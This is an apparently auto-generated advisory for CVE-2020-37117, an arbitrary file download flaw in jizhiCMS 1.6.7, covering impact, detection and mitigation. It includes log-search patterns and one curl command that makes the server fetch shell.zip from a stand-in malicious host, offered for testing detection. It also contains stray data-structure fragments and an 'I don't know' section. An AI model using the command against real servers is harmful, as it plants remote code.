Executive Summary

[{'type': 'paragraph', 'content': "CVE-2020-37117 is an arbitrary file download vulnerability in jizhiCMS version 1.6.7. It exists in the admin plugins update endpoint, where authenticated administrators can be tricked into sending crafted POST requests containing malicious 'filepath' and 'download_url' parameters. This allows attackers to download arbitrary files from the server."}, {'type': 'paragraph', 'content': 'The exploit involves sending specially crafted POST requests to the endpoint /admin.php/Plugins/update.html, which can trigger unauthorized file downloads and even unzip malicious files on the server, potentially leading to remote code execution.'}] [1, 3]

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive files on the server, which compromises confidentiality.

Additionally, by downloading and unzipping malicious files, attackers may execute arbitrary code on the server, affecting integrity and availability of the system.

Because the vulnerability requires authenticated administrator privileges, it can be exploited by insiders or attackers who have gained admin access.

Useful 0 Not Useful 0

Compliance Impact

I don't know

Useful 0 Not Useful 0

Detection Guidance

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring for suspicious POST requests sent to the endpoint /admin.php/Plugins/update.html that include parameters such as action=start-download or action=file-upzip along with filepath and download_url parameters.'}, {'type': 'paragraph', 'content': 'You can use network monitoring tools or web server logs to look for these crafted POST requests indicating attempts to exploit the arbitrary file download vulnerability.'}, {'type': 'paragraph', 'content': 'Example commands to detect such activity might include using curl to simulate or detect these requests or using grep to search web server logs for suspicious POST requests.'}, {'type': 'list_item', 'content': "grep 'POST /admin.php/Plugins/update.html' /var/log/apache2/access.log | grep -E 'action=start-download|action=file-upzip'"}, {'type': 'list_item', 'content': "tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -E 'action=start-download|action=file-upzip'"}, {'type': 'list_item', 'content': "curl -X POST 'http://target/admin.php/Plugins/update.html' -d 'action=start-download&filepath=shell&download_url=http://malicious.server/shell.zip' (for testing detection)"}] [1, 3]

Useful 0 Not Useful 0

Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable admin plugins update endpoint to trusted administrators only and ensuring strong authentication is enforced.

You should also monitor and block suspicious POST requests that attempt to exploit the file download functionality by filtering or blocking requests with parameters like action=start-download or action=file-upzip.

Updating jizhiCMS to a version that patches this vulnerability, if available, is strongly recommended.

If patching is not immediately possible, consider disabling or restricting the plugin update functionality temporarily to prevent exploitation.

Useful 0 Not Useful 0